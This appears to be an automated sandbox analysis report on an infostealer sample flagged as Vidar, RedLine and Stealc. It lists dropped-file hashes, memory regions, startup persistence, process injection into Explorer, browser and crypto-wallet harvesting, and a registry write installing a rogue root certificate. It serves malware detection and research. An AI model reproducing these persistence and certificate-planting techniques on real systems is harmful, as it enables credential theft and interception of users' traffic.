| SHA1 | cfe487e10af8b2f9172c5fbda169f54e7455650c |
| SHA256 | 5735673194545ca3dff95c5bde0ee754ada08b0eca9088d8ba79b93f2d130a8e |
| SHA512 | dd41671a84900c2b2fd7aa278c3593129bf304954c485daef3e2c0ab3865d18f79ca0407414cd9ddc018aa00d477458ebb372ef1915ce7a2972059b36d8522a0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Appliance
| MD5 | 49374b13b9c4f58f051bdb7ee0d76659 |
| SHA1 | 3d9d3cc5abee44d9bc126daed5f57e74cbd14108 |
| SHA256 | 65f44a8f162f34a88331d0a606c273ce1bbae78d52d353c41af0e14acfc44516 |
| SHA512 | 371605fabad80e15eaef3e0642179ab0b6bb31c0cb43883b4ee0913b6815fc91f22697e706ef87276b6896a69d08e58770269e1a2fd48291915bea03a14dfe51 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Sunshine
| MD5 | d01a3273484cec0753fcd7f1bfb5ad28 |
| SHA1 | a88212cc70f516d81f153a20740564f096b3f9da |
| SHA256 | d33a2962db7cdcd2a2f42773a49fde37b5b16b6c37c60b8910ac8462e1729387 |
| SHA512 | a8508aa3798ad61c4a224096f0ab609ac8f960b81447445bc039ada5a8b6bd6e7731613c52cb192e288a4aa24ec32ef193498991e10d80ff756a12bf1a319e21 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Consumer
| MD5 | 277d95045008c339f30cd2138f67b25c |
| SHA1 | 64d566c65608f9047dac591a141de2659b66d4eb |
| SHA256 | 4ea42616dce46c7cc45c813c97b09e609e10f793cd5e921abd4c15a10131a7f5 |
| SHA512 | d29585fbd18f82741c38f4f43d91b3fca0f24c5bbcd35ac49dc5413d0f40c48f313f8d10bf75b257caf71be640f13e2abd25d098a68ac0f80edd00a7dbc79408 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Judy
| MD5 | 989119944404397a4981237b09b24d75 |
| SHA1 | 14f3b87c37d841d8332481c0f3ac50b9d00b080f |
| SHA256 | 05601480ab6af823474170d0953d1a697d0a1fe8860ea0c8862552769dabc2be |
| SHA512 | 96013745fd64ed52123a94861f2c70651de2811cbd180af694c8d9198b66775cb1a3b5b525ae1312576d565b1a1515ed19107f3c7de3593d39de13b36ec34167 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Sexual
| MD5 | 8d766c72362a3019af14ee2ad2dfecee |
| SHA1 | 7f2dfe42303f4232d067e470a9374353205a4ddd |
| SHA256 | b8174289e0747853509c4ed4deacc2d473b7fbeff3baac0bf9f73934c0cb97e9 |
| SHA512 | 4daad1ad89e6f673ab2545d04090c550c7335a3bf6bb5079784bdcd19571bb1265698a5fa9abb1900a7808a9e8b2e6900d43a65bcbc3599fffc2e830b764f4f9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Latino
| MD5 | bb1437b2be87b0e7808503c208335115 |
| SHA1 | 15614fcff03411eb862b0e54c43511f86b8b45ea |
| SHA256 | 3719418bedd1399af15de17e743dad77248c4558bce086eb0c45f8264387126c |
| SHA512 | 101b4e2898e9e5fc5e2303ab2a1ebec639aa08c00a1fbec26e246ac6a213be5dc1136854eb39aef5e0e2d784a52d8e9f1147699b8c12c6a417dc2a167dde877c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Reforms
| MD5 | dc61f4044639fd045e46dc6748a87d9e |
| SHA1 | 63b918503271e064f7408f477d4d205b9af30add |
| SHA256 | d1e7f246ce79ba130d6653ad97f647a139c912f033fb60605009618ea178cf70 |
| SHA512 | 11709c10bb721452daaee66f2c643df1ccf8e55ca857924a9f0b0a6e1737e75ef8a959490ca053d3cf88191257627a46b8ac921597e1412bdff35cc05e97a5e1 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Nike
| MD5 | b4a58ae8b656f1ea7e3a98f4678bf049 |
| SHA1 | 359da6812af74179bff2cc0fb28984fd20790953 |
| SHA256 | 038e6cd0dcab07282e97cf8f4aa0d7b12f1a07c14530a3661220603ee84ce679 |
| SHA512 | a9d3568f645e5bc081300c61650e2bf7e82bb09f85985966f765ae86102eb4f1aff0060ab7a0ce9a45fe3cef522b7d4c192d993e31f6aa007e6cbb751169edcc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Informal
| MD5 | 308b2a784c4849fa646c16c85e46db57 |
| SHA1 | 6c204085a8daf9c2ff2cff82493bda512e443231 |
| SHA256 | 7c9e13c6a5cca237ac37dac367b7e2eb335f4413e57f9ed4e849b5739bbe1341 |
| SHA512 | 26199679a129b0a2f606ee1ee1e29df63366eece499c3471df89e03d87c5d16dbf7ed88917b645e7fde1d99e3f7bcef9b8912e900dfab35cf29ff8eb2be1a8cd |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Payable
| MD5 | ed66913e24b94acaac796df6d8da853c |
| SHA1 | 0c06b06c193898ab92114ad87d66495d579b6a37 |
| SHA256 | f9b6b58c1b6e1561dcae4cfc0bbbf21ea9d59a4c4793f6c1b6a4d7713e264194 |
| SHA512 | c425a1749fd37fa2ea61fede81824e1276ade07ba38ebf9dd0d0008f64616d17bce2e48258f49c476dc1c05efa12a8ff80e1357a1a4e5451a363a2647247083d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Coordinate
| MD5 | cd5637ca9203c24691de8969105a311f |
| SHA1 | 559d893dd1f4da99c95d88e21d2eb237112717da |
| SHA256 | ec3d73a8a899771543a4faa68290dc953e7a529bc5ff32f7a209ca35b1eca6a9 |
| SHA512 | b6a2ce7a442e592ea0e98e8f337999279e44f1de154c47dabce0469b75dc0bd468ea071a0611f3737fe5a723267b020db7e79941be79ceb15694cadd81e87739 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Request
| MD5 | eb95701a7ff95c58502a1cbbefae9125 |
| SHA1 | 6259d70bdd9c70296b6732e0ad2bd682e3a4eb29 |
| SHA256 | d13021de90948299992799f6ec233f0e57ade10b2598e80a6d39aeb618d07271 |
| SHA512 | a9b0be84a053ec9f006ca0d3fc379831690307ddc6de8a9c6f475df151f122e11b18261908e8d12c48c1bbbb629de0e98ba422152aa0bcfa384e929b3fc9a77b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Dan
| MD5 | ea49e906570d2d458da3fc23cbcd384a |
| SHA1 | 979876699a5cc6c664f142e0f62def3aeeb6b44d |
| SHA256 | 8990eb95822a87bd9c3f79e133a3cf935896c9e8acf9bbd0dfa3b80a1ec8f21d |
| SHA512 | 094a67e9eb4ecbdf60b992fd421bffdd31f46805e8643322d1bc8e6ea70d4c8a1ac77a3e72e29be3845eb399817ef19d257ac2f2c2232f40968957cf7a0f6591 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Tmp
| MD5 | 902d734dbec4e6cdafec0fc573ea4f57 |
| SHA1 | 462a62c7244f6d6ab91c42ad42cabedeb22c5073 |
| SHA256 | 1ca299906b687ad1ca4a5779b24f75430ac1191409c5d9b14d8b369c6713b0a3 |
| SHA512 | f40bbc66dbfb1527568fb76029e09d3248a757060455fd3ec53668c5433b7c8f604347f836d56c4ef9ebc77c979ebec28a5a812d2779d75d4afca6407a41b587 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Accuracy
| MD5 | ddee3bfc70fd8523d10423776459d741 |
| SHA1 | 8d5a0f2cd593411f6d55769edfddca3c1101e0f4 |
| SHA256 | dcaad958200e2a764b31545bcdd63b32757fe0cbc4f1894abbc1dba48b75ee59 |
| SHA512 | b57b338bc38ee392827e8c67d53a400c40f65af4792e8df7e2cf877a8e9295d375a334d6cf4f21dc6da3c9cd35647e59d1f07c494d15469ff78e24dfa2efd8b2 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Responded
| MD5 | 71749fa91d313964253f9f99351c5ea5 |
| SHA1 | 21a0661fd1831076ea5c95d6e5d570697a327e81 |
| SHA256 | f56d160cd1901842abb36fb1bd3560501b41d13b76f25e863e1f10e1b9960b05 |
| SHA512 | a162629bc8894573777850e3e16353767c0003a0a6ceeac56d8584e2e66746eb676fbbc683fc7226c9e923a37fbb98e69af4270fc260629f51505d6185bb6417 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Breakfast
| MD5 | fb3813fa06ee53d1c852bbca645880d9 |
| SHA1 | 98b9f1d739629b37bf14bb8d1874a4be3d269ffb |
| SHA256 | 944e7c240f6467e28cf5d558ca431c05c73cbbb82e8d5e13b7bef510351f7d5f |
| SHA512 | 1b75dfc488eaa5fd07bf758aab0baa14536eb73a647ff6759b86e859992bf2396f6015c8d299f728642938b9ed46a9d75754eeeaf85411827123baaeec5458e2 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Dinner
| MD5 | d16292b81c73075a08eb37518afba6c7 |
| SHA1 | 616b2dfc79d17ecec75850bc94e7a156a062303c |
| SHA256 | 7be3633b9ffc2c65434f5933c0282341dc3be1814f3e53fb23ad55a6442292d2 |
| SHA512 | f7d6ee24d200f8cd4a562f4b69c26925d29abee38f0ac3bb9041e532bc25792fbd9a657415068903eddd758fbb9479bad5c0a38e1e3915d3197820e2b79c6280 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Steven
| MD5 | e9706721344cc69dc298727fd216bf0c |
| SHA1 | 8ac8f598326a82a2be44a9d311d41fef6ba10f2b |
| SHA256 | 7eb20faa2b9240d2b6df521424b44bc95748f1dbea8086e50a45a6a7ac25aca0 |
| SHA512 | c3a4a7e9d9a9418451e862c7371d12331404f13b04e27742b6e91765e2bebbe14b56613c4c59895f74c7e965dfc1d6d22186799301ec1a8b369ad7ba02571cb9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\1151\Equivalent.pif
| MD5 | 62d09f076e6e0240548c2f837536a46a |
| SHA1 | 26bdbc63af8abae9a8fb6ec0913a307ef6614cf2 |
| SHA256 | 1300262a9d6bb6fcbefc0d299cce194435790e70b9c7b4a651e202e90a32fd49 |
| SHA512 | 32de0d8bb57f3d3eb01d16950b07176866c7fb2e737d9811f61f7be6606a6a38a5fc5d4d2ae54a190636409b2a7943abca292d6cefaa89df1fc474a1312c695f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\1151\Q
| MD5 | cbe6470aa4c079b90c574d166092a979 |
| SHA1 | ccaf0c65ec9bd008744ffe40568ce51e6bae713d |
| SHA256 | 3b7825dc157b085a7b3716112ff054b6551dd0509344197b94a3627d9f156765 |
| SHA512 | 93e97ec04af55a8652955680096c6e48883040a668ac23c9db450187accdc09b3ea01475e4108d4b6761657ec9728bc05235262c083f004dc864f1090a252188 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Reprint
| MD5 | 55dd4a20f7eeebd633cd9686d55a6fb2 |
| SHA1 | 400dcd289e265494671d162731aea59eacceab0d |
| SHA256 | dff5d673567b73e1bb4ecc210d61d1db5a5653920cb2aba84d1cef5d6d3ebabe |
| SHA512 | 59748f5fd92a00d3234c06ce3335cd9b387a48449b454aef915ab539d13de2c5983892c9d88fd713327b2fa67e5ec2b1f2e2417a52fb38f4c4b56f079d8a6d16 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Does
| MD5 | 77e157cb17ed60656abee35ef0346168 |
| SHA1 | 1c3d0dfcbc3be543b798b74cd92958128ca8b128 |
| SHA256 | e257d8d93bf73e5e4a8c40fbdceb6e13e9651f683f18782d6cea323402a07548 |
| SHA512 | 3e970d2773b117c02b3640935704f2e3ec62cc7dc5d12364efe80249c1ca7c8231f4d6b245f1c744f4fa69441fd2e40681e0f9dd886d3f4f245624cad3db3082 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\His
| MD5 | 751c49aad91b18494d138ee0cc6cb622 |
| SHA1 | 621725721b84a279817f3bc0bcc9b325218548ce |
| SHA256 | 3bdeea17d6e666560aee48eb09fadc35c8715540b6ac68e5800018100ecab0cc |
| SHA512 | 3570f90da5ef4386f57233aeb6caa1f8e71dc9a3caa92b05bb56a768d7569a2d074bfbb3e89d975f8cceb458013538aa331da6870ea006a148405346e8b06c76 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Proposition
| MD5 | 1702b70ee4cbb05665de2037f0f88161 |
| SHA1 | 8be05a314d814265b8da7ee8a934624753fbd38d |
| SHA256 | 6492974c3ce14d4813b4cf2da843329a435648a339b95dfd32f8d566626a5f99 |
| SHA512 | 5a0b7cbdde942a176fb9f9ba238a4e15c2d6da1cf0e7eb3742c69727faf447d21d62eaeee2bcc9b2b7b92b9a8cf4c48f47ce28f16a6c3613a95114deb0083f2d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Spears
| MD5 | 8545d958ef99bfb24b569ab066d8e27d |
| SHA1 | 303b7b887280b61cae2936201cebb874c16f9b3b |
| SHA256 | e67d227e4dfc69ff61d03c5ece2ce16458f8ae590a133976397129bf9ee56406 |
| SHA512 | b2c357bd47f6a470b12e1ae518706814166f053f242c73abbdc230cfa07a56baf7917e63adb1563161583adb89a2f2a7d7ed7d7d22ab3324674a3c7b0bb94ee6 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Laden
| MD5 | 900fe58c36324ceac6581212821ad122 |
| SHA1 | 3e8ff27af8047e98151368d414eafebeffb88e28 |
| SHA256 | 71caf18a2e40d456dd84d694a55d92e417342c524de6239157236efc6b9b32bc |
| SHA512 | e3db08c30c33438b9b6052c10f7d93b1b301a71bc0d8be7a2f95c518056cb129bc6ca4cff12876f5587bddb745abcc3d45d929eef1dcf157487fdd1b6302dcf0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Evolution
| MD5 | 0901b0d0d512bc902feb25490157ffbf |
| SHA1 | b84050cb0496f45b7676ca8237ffd1c1de6d68df |
| SHA256 | 7c2053611fa9cd19b733cb2594caaa1acc1c0d5e9356c6fce5b158c377090ac0 |
| SHA512 | 2b3876ef3b8fff839c10a9119b62b187faea4d4a384815e70e88a29990d9bb8079957bad74e66bc93172c3a8584c652202788e3ac5b7c0309df8ebd8d7465186 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Visit
| MD5 | f8116f63158d44b8a32653ba47d338be |
| SHA1 | 4ce47792d29f7b2d59f2aed06ed530da7ec7db46 |
| SHA256 | 9db8cebd14a1aab1c4dcece95213d4e91941b173e515c079f9913e8323f9520a |
| SHA512 | df97dd0a2e574503fd0593bccec021d460f22dda3c8b9d78ffcc3db7e447d9ea79206dfde6db13038803efa5cf6c5f80124a79b77232e273e96d1a0264b2d646 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Total
| MD5 | af32b2e863ee66a1b6dd74ca65861a05 |
| SHA1 | f1c1c69841d4f47daee1e7f7e1378c5782ce90a4 |
| SHA256 | 64a77c215107ea2183e66cc34352c7d0afdec70e6d794877592c1db7bfcb9264 |
| SHA512 | bf64cc545d5daf167b9af8506e631683e765f809d43c6799e57db60065d1169c991ec83a8b0876ed9582ba3090441403ecba34a1e4c7706cfe06e7203d97fa15 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Corporation
| MD5 | 95d99506ebd81f275db7405c10105217 |
| SHA1 | 770d862a3b2b6c4cdd0dbad515c1b1837e73a85e |
| SHA256 | a39564a2ad5fc274b639108b898d21382c168ef4f4bb16d1a1783550bb3e51c2 |
| SHA512 | 86b3f0faf4aa7265da039d3ff01fb03f47137272a8ad1c17bf0b5496a9d0e4b812108b164a938bdde4f031e1a1140bfdd8ee4a6c2b1bfa7f27f76191934c7367 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Proper
| MD5 | c037de0212cd77bb2acb71b45e2bb7d4 |
| SHA1 | c27d9fd633e3b7ca1de016e804b9f49d485d2e02 |
| SHA256 | 3e767c7ae42fa1a838709ffc869d72558b381f8a359eb8f2dcc7e9ad43abae20 |
| SHA512 | cbe7ae3587c49af096ee7e0188ae94285a27109343940e78fa78e49a75dfe51be5683708b568fb24a39bba6b296f59f03df23c3b7fefb501c611ce96a8111fdf |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Bd
| MD5 | ab82d61f75d101eb20cf0a19b79d722d |
| SHA1 | cd32f6392116f7f3ffd211fcdbdb155e0a0bc301 |
| SHA256 | 6292db893218d11fce76dcd5f14b73addd6f6fd19d17661fffe351d55c31145d |
| SHA512 | b166f9bbb0ed16f1c39218dd9cd29b0978568450d7592e4fbc5f3d73acee59772c8f8a713f381148dd9c05a31002641f2976892d55bcb6acc0c77dcc3af35402 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Submission
| MD5 | 00a438783b8ab51d81596ac52ad07157 |
| SHA1 | 55a56232dafe2610d381f536eb942009d5972233 |
| SHA256 | dba238af26bbf85836d27c52ada3106b865ce90b6a17a37247a12ce38c5559e1 |
| SHA512 | 5e0854668487d9eefd3ed36afeb96fbeb78a4a15689d41b29a5a6048df81aba1a9e5e3a22b4cef6f68750be747aa8a84c15c277a1edd6090118d5c99c49faf5f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Turkey
| MD5 | 5d869b16db71ff094e1b063bf014edcb |
| SHA1 | b9003c1ea2eaa6e8443b2a5cd4df570369cf39f6 |
| SHA256 | aa50cd9ab888451202b74afb1b533dfa884b0d3d5184f757f43310d6e2a4dd3c |
| SHA512 | 7508a27b0b7a6e22cbb9d66529b8d66b8054e2db77a4dfea4d7420b69f970281b1a46c6d08c2b1a2e973613046aed7ae6a17610e34f8c4330485c6a325c84b40 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | bd4982658a54e540dcd2517ff7989798 |
| SHA1 | 42a9c4ea17bad9908f376d0ee2385ad9895a9cec |
| SHA256 | a148dd1074cf8a7b60e40a433cf2018b862db6eade0d81001411cffc85880530 |
| SHA512 | f46b3f6a475444534dd75ba9c5b9ac62001fa04bb4c8fc9ae7efb6a3e836db5fa90ea3a0eede52723d53fbb4f733ca5097f8dd19561fd1a62e96f264c70f0c75 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | c546a5512148999d4ec2e3fb5c8738d3 |
| SHA1 | ff8572543a517992355d94f64abe4436a57fdd97 |
| SHA256 | fecc189d8870a5e4d223a7a2eb41219f60c87539efec63d3daa396eebf8978a1 |
| SHA512 | 4518778477400def80cefde3cb62819de36c9cf4c3f7bfcbf643ec7eab8d0e5dcaf11fa0f3654a2cc7f954286465c2a185f3e5702e2f2d37c4e29613f09ae850 |
memory/3700-286-0x0000000004650000-0x0000000004897000-memory.dmp
memory/3700-284-0x0000000004650000-0x0000000004897000-memory.dmp
memory/3700-285-0x0000000004650000-0x0000000004897000-memory.dmp
memory/3700-288-0x0000000004650000-0x0000000004897000-memory.dmp
memory/3700-287-0x0000000004650000-0x0000000004897000-memory.dmp
memory/3840-294-0x0000000001360000-0x00000000013B2000-memory.dmp
memory/3840-295-0x0000000005D30000-0x000000000622E000-memory.dmp
memory/3840-296-0x00000000058D0000-0x0000000005962000-memory.dmp
memory/3840-297-0x0000000005870000-0x000000000587A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\TmpC109.tmp
| MD5 | 1420d30f964eac2c85b2ccfe968eebce |
| SHA1 | bdf9a6876578a3e38079c4f8cf5d6c79687ad750 |
| SHA256 | f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9 |
| SHA512 | 6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8 |
memory/3840-314-0x00000000064F0000-0x0000000006566000-memory.dmp
memory/3840-315-0x0000000006B10000-0x0000000006B2E000-memory.dmp
memory/3840-317-0x0000000007240000-0x0000000007846000-memory.dmp
memory/3840-318-0x0000000006DB0000-0x0000000006EBA000-memory.dmp
memory/3840-319-0x0000000006CE0000-0x0000000006CF2000-memory.dmp
memory/3840-320-0x0000000006D40000-0x0000000006D7E000-memory.dmp
memory/3840-321-0x0000000006EC0000-0x0000000006F0B000-memory.dmp
memory/3840-322-0x0000000006FA0000-0x0000000006FC4000-memory.dmp
memory/3840-325-0x00000000070E0000-0x00000000071EE000-memory.dmp
memory/3840-326-0x0000000007040000-0x00000000070A6000-memory.dmp
memory/3840-327-0x0000000007AA0000-0x0000000007AF0000-memory.dmp
memory/3840-328-0x0000000008290000-0x0000000008452000-memory.dmp
memory/3840-329-0x0000000008EA0000-0x00000000093CC000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-09 13:02
Reported
2024-05-09 13:07
Platform
win7-20240508-ja
Max time kernel
253s
Max time network
146s
Command Line
Signatures
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Stealc
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1712 created 1328 | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\55206725\Announcement.pif | C:\Windows\Explorer.EXE |
| PID 1712 created 1328 | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\55206725\Announcement.pif | C:\Windows\Explorer.EXE |
Vidar
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LynxChat.url | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LynxChat.url | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\55206725\Announcement.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\55206725\RegAsm.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Enumerates physical storage devices
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\1181\Equivalent.pif | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0f000000010000002000000020d814fd5fc477ce74425e441d8f5b48d38db6f1dd119441bc35777689bd094c030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b0640200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000000b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900000020000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\1181\Equivalent.pif | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 190000000100000010000000dbd91ea86008fd8536f2b37529666c7b0f000000010000002000000020d814fd5fc477ce74425e441d8f5b48d38db6f1dd119441bc35777689bd094c030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b0640200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000000b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f0072006900740079000000140000000100000014000000f352eacf816860c1097c4b852f4332dd93eb5d4f20000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\1181\Equivalent.pif | N/A |
